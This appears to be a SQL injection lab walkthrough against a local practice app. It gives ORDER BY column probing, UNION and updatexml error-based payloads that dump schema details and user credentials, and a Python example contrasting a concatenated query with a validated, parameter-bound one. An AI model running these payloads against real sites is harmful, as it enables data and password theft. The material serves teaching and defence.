When the column number given to order by is not greater than the number of columns in the query, the statement executes normally; when it is greater than the number of columns in the query, the statement returns an error.
Determining the position of the output parameters
union select 1,2,3
The values 2 and 3 appear in the output page, so these two positions are the ones that are displayed.
View basic database information
union select 1,version(),database()
2, union injection
1, display position
2, list the tables in the database
union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'
3, list the columns of the corresponding table
union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'
4, view account and password information
union select 1,group_concat(username),group_concat(password) from users
5, source code analysis
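The source of sql-1.php is not shown on this page, so the following is an added example, not the page's own code: it assumes the handler pastes the id parameter into a three-column query, and shows that pattern beside a validated, parameter-bound version. SQLite stands in for MySQL, and the table contents and function names are constructed for the illustration.

```python
import re
import sqlite3

# The step-4 query from this page, as it would arrive in the id parameter.
PAGE_PAYLOAD = ("-1 union select 1,group_concat(username),"
                "group_concat(password) from users")

def make_db():
    # Constructed sample data; SQLite replaces the page's MySQL server.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY,"
               " username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [(1, "alice", "pw-alice"), (2, "bob", "pw-bob")])
    return db

def lookup_vulnerable(db, raw_id):
    # Assumed flaw: the parameter becomes part of the SQL text, so anything
    # after the number is parsed as SQL and the UNION branch is executed.
    sql = "SELECT id, username, password FROM users WHERE id=" + raw_id
    return db.execute(sql).fetchall()

def lookup_hardened(db, raw_id):
    # 1. Validate: the id must be a short run of ASCII digits, nothing else.
    if not re.fullmatch(r"[0-9]{1,10}", raw_id):
        raise ValueError("id must be a decimal integer")
    # 2. Bind: the value is passed as data and never concatenated into SQL.
    sql = "SELECT id, username, password FROM users WHERE id = ?"
    return db.execute(sql, (int(raw_id),)).fetchall()

def lookup_bound_only(db, raw_id):
    # Binding alone already defeats the payload: the whole string is compared
    # with the id column as one value and matches no row.
    sql = "SELECT id, username, password FROM users WHERE id = ?"
    return db.execute(sql, (raw_id,)).fetchall()

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", lookup_vulnerable(db, PAGE_PAYLOAD))
    print("bound only:", lookup_bound_only(db, PAGE_PAYLOAD))
    try:
        lookup_hardened(db, PAGE_PAYLOAD)
    except ValueError as exc:
        print("hardened  : rejected,", exc)
    print("hardened  :", lookup_hardened(db, "1"))
```

The error-based queries in the next section depend on the same concatenation, so the bound version closes that path as well; not echoing database errors to the page removes the output channel they rely on.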
3, error-based injection
http://localhost/sql-1.php?id=-1 and updatexml(1,concat(0x7e,database()),1)
The database error message must be returned in the page.
http://localhost/sql-1.php?id=-1 and updatexml(1,concat(0x7e,(select substring(group_concat(schema_name),21,20)from information_schema.schemata) ),1)
http://localhost/sql-1.php?id=-1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema = 'security') ),1)
http://localhost/sql-1.php?id=-1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name='users' ) ),1)
http://localhost/sql-1.php?id=-1 and updatexml(1,concat(0x7e,(select group_concat(concat_ws(0x7e,username,password))from security.users ) ),1)